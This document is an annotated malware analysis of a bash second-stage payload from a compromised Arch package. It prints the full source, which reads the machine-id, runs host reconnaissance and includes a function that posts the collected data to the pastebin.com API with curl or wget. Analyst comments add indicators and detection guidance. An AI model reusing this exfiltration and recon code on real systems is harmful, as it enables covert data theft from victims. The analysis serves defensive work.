`~u` — file downloaded as the second-stage payload in the public Arch package compromise
#!/bin/bash | |
function urle() { | |
# Percent-encodes a fixed set of characters read on stdin, one `sed -e` per
# character. Two things a reader should not take at face value:
#  - none of the expressions carries the `g` flag, so only the first
#    occurrence of each character per line is replaced;
#  - in a sed regex `$` is the end-of-line anchor, not a literal dollar
#    sign, so `s|$|%24|` appends "%24" to the end of every line.
# Analyst note: because of this, values passed through urle (the paste title
# and body) are not reliably encoded; do not build exact-match indicators on
# the encoded form.
sed -e 's|!|%21|' -e 's|#|%23|' -e 's|$|%24|' -e 's|&|%26|' -e "s|'|%27|" -e 's|(|%28|' -e 's|)|%29|' -e 's|*|%2a|' -e 's|+|%2b|' -e 's|,|%2c|' -e 's|/|%2f|' -e 's|:|%3a|' -e 's|;|%3b|' -e 's|=|%3d|' -e 's|?|%3f|' -e 's|@|%40|' -e 's|\[|%5b|' -e 's|]|%5d|' | |
} | |
# Export urle to the environment so any child bash process also has it.
declare -fx urle | |
# Assigned empty and never read again in this file.
GID= | |
# Stable per-host identifier, used below as the victim ID in the paste title.
# Detection: reads of /etc/machine-id by a package install/post-install
# context are worth alerting on.
MACHINE_ID="$(cat /etc/machine-id)" | |
# Paste title is the literal tag "[xeactor]" followed by the machine-id,
# run through urle. The "[xeactor]" string is a usable indicator for this
# sample. $MACHINE_ID is expanded unquoted here (harmless for a plain
# machine-id value, but not robust).
PASTE_TITLE="$(echo [xeactor]\ $MACHINE_ID|urle)" | |
#######################################
# Exfiltration helper: POSTs its single argument as a new public paste to
# the pastebin.com API, using whichever HTTP client HTTP_CLIENT names.
# Globals:   HTTP_CLIENT (read), PASTE_TITLE (read)
# Arguments: $1 - text to post (url-encoded via urle, expanded unquoted)
# Outputs:   none; all client output is discarded
# Returns:   status of the curl/wget invocation (ignored by callers)
# Analyst notes:
#  - the api_dev_key on the request line is hard-coded in this sample and
#    api_paste_private=0 makes the paste public;
#  - if HTTP_CLIENT is neither "curl" nor "wget", prefix stays unset and the
#    request string itself is executed as a command (fails, error hidden).
# Detection: outbound HTTPS POST to pastebin.com/api/api_post.php from a
# script started during package installation.
#######################################
upload() { | |
up_data="$(echo $1|urle)" | |
if [[ "$HTTP_CLIENT" == "curl" ]]; then | |
prefix='curl -s --data' | |
elif [[ "$HTTP_CLIENT" == "wget" ]]; then | |
prefix='wget -O/dev/null -q --post-data' | |
fi | |
# $prefix is intentionally unquoted so it word-splits into a command plus
# options; stdout and stderr are both thrown away.
$prefix "api_dev_key=42ba93112cc9677382e55e5e387eafa1&api_paste_private=0&api_paste_name=${PASTE_TITLE}&api_option=paste&api_paste_code=$up_data" "https://pastebin.com/api/api_post.php" >/dev/null 2>&1 | |
} | |
# Pick an HTTP client: wget is preferred over curl. If neither is installed
# the script exits silently with status 0 - a host without wget/curl is
# simply skipped, and the caller sees no error.
if which wget >/dev/null 2>&1; then | |
export HTTP_CLIENT=wget | |
elif which curl >/dev/null 2>&1; then | |
export HTTP_CLIENT=curl | |
else | |
exit 0 | |
fi | |
# Runs "$@" and wraps it for the log: a "[cmd] `...`:" header line, the
# command's combined stdout+stderr, then a blank line.
cmd_log() { echo "[cmd] \`$@\`:"; "$@" 2>&1; echo; } | |
#######################################
# Host reconnaissance: prints the machine-id followed by the output of a
# fixed list of enumeration commands (timestamp, kernel/arch, current user
# and groups, CPU details, explicitly installed and dependency packages,
# systemd units). Everything goes to stdout for the caller to capture.
# Globals:   MACHINE_ID (read)
# Detection: this burst of lscpu / pacman -Qeq / pacman -Qdq /
# systemctl list-units from one bash parent, shortly after a package
# install, is the behavioural signature of this stage.
#######################################
full_log() { | |
echo ${MACHINE_ID} | |
cmd_log date '+%s' | |
cmd_log uname -a | |
cmd_log id | |
cmd_log lscpu | |
cmd_log pacman -Qeq | |
cmd_log pacman -Qdq | |
cmd_log systemctl list-units | |
} | |
# Capture the full recon output once.
FULL_LOG="$(full_log)" | |
# No variable named `uploader` is assigned anywhere in this file, so this
# expands to an empty command name and bash tries to execute the log text
# itself (which fails). As written, nothing in this file ever calls the
# upload function above - relevant when judging whether pastebin traffic
# should be expected from an affected host.
$uploader "$FULL_LOG" | |
# Drop the recon log into compromised.txt under /root and each /home/*
# directory, but only where that file ALREADY exists and is writable:
# `-w` on a non-existent path is false, so this never creates the file.
# Detection/IR: the presence or modification of <home>/compromised.txt
# is an artifact to look for.
for x in /root /home/*; do | |
if [[ -w "$x/compromised.txt" ]]; then | |
echo "$FULL_LOG" > "$x/compromised.txt" | |
fi | |
done | |
# Always reports success, hiding every failure above from the caller.
exit 0 | |